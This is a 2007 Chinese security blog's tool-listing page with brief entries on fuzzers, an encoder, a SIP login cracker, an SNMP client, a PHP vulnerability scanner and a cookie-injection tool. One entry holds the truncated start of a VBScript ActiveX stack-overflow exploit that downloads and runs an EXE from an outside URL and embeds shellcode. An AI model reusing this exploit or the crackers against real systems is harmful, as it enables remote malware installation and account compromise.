分类 ‘工具收集’ 下的日志

Fuzzers

2007/11/25 2:44 | 鬼仔 | 工具收集 | 消灭0回复

来源:zwell's blog

关键字(Keywords) : fuzzing, fuzz testing, fuzzer.

antiparser
antiparser is a fuzz testing and fault injection API. The purpose of antiparser is to provide an API that can be used to model network protocols and file formats by their composite data types. Once a model has been created, 阅读全文 »

Tags:

Encoder

2007/11/25 2:40 | 鬼仔 | 工具收集 | 消灭0回复

Name: encoder
Version: 1.0
Author: ZwelL
Date: 2007.10.30
Link: http://www.nosec.org/web/index.php?q=encoder
Download: encoder.exe

Support:
* BASE64
* URI
* MD4
* MD5-32
* SHA1
* SHA256
* SHA384
* SHA512
* CRC32

Tags:

sipNosec

2007/11/25 2:35 | 鬼仔 | 工具收集 | 消灭0回复

Name: sipNosec

Version: 1.0

Author: ZwelL

Date: 2007.8.12

Link: http://www.nosec.org/web/index.php?q=sipNosec

Download: sipNosec.exe

sipNosec is a SIP protocol login cracker that contains 2 components: sniffer and cracker. It is similar to sipcrack 阅读全文 »

Tags:

siprint

2007/11/25 2:31 | 鬼仔 | 工具收集 | 消灭0回复

Name: siprint
Version: 1.1
Author: ZwelL
Date: 2007.7.8
Link: http://www.nosec.org/web/index.php?q=siprint
Download: siprint.exe signatures.txt

Today I officially released the siprint tool to the wide public. As the name show : siprint 阅读全文 »

Tags:

SnmpDigger–SNMP客户端程序

2007/11/24 12:41 | 鬼仔 | 工具收集 | 消灭0回复

作者:zwell
来源:zwell's blog

昨天与同事聊起了SNMP协议的一些东西。就随手做了个SNMP的客户端。

事实上在一些渗透测试过程中,通过SNMP是能够做很多事情的,简单的来说信息泄露一般都存在,运气好的话还能来个“拒绝服务”。

之前用的一些商用版的,存在版权问题,现在自己做了一个,用的很顺手,以后有需要再加吧 ;)
Name: SnmpDigger
Version: 0.2
Author: ZwelL
Date: 2007.11.23
Link: http://www.nosec.org/web/index.php?q=snmpdigger
Download: snmpdigger_bin.rar
阅读全文 »

Tags: ,

联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

2007/11/24 5:32 | 鬼仔 | 工具收集 | 消灭0回复

鬼仔注:又见联众

来源:vbs空间

exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8 阅读全文 »

Tags: , , ,

Pixy – PHP 原始码的弱点分析工具

2007/11/23 2:36 | 鬼仔 | 工具收集 | 消灭0回复

来源:资安之眼

XSS 及 SQL injection 已成为当前网页应用程式的主要问题,本站也介绍过一些免费的小工具,像是网页程式执行后的 Wapiti 渗透工具,执行中的 PHPIDS 入侵侦测工具,而这次的工具则是执行前的 Pixy原始码检测工具。

Pixy是一套以 Java 开发 PHP 原始码扫描工具,主要用以自动发掘 XSS 及 SQL injection 问题,只要作业系统已安装了Java SE6,解压缩后即可执行,在 run-all.pl (如果你的环境有安装 Perl) 或是 run-all.bat (仅供Windows) 后面接上你的 阅读全文 »

Tags:

cookies注入加速工具-ASP版

2007/11/21 4:44 | 鬼仔 | 工具收集 | 消灭0回复

作者:zj1244
来源:职业欠钱&zj1244共用的public Blog

阅读全文 »

Tags: , , ,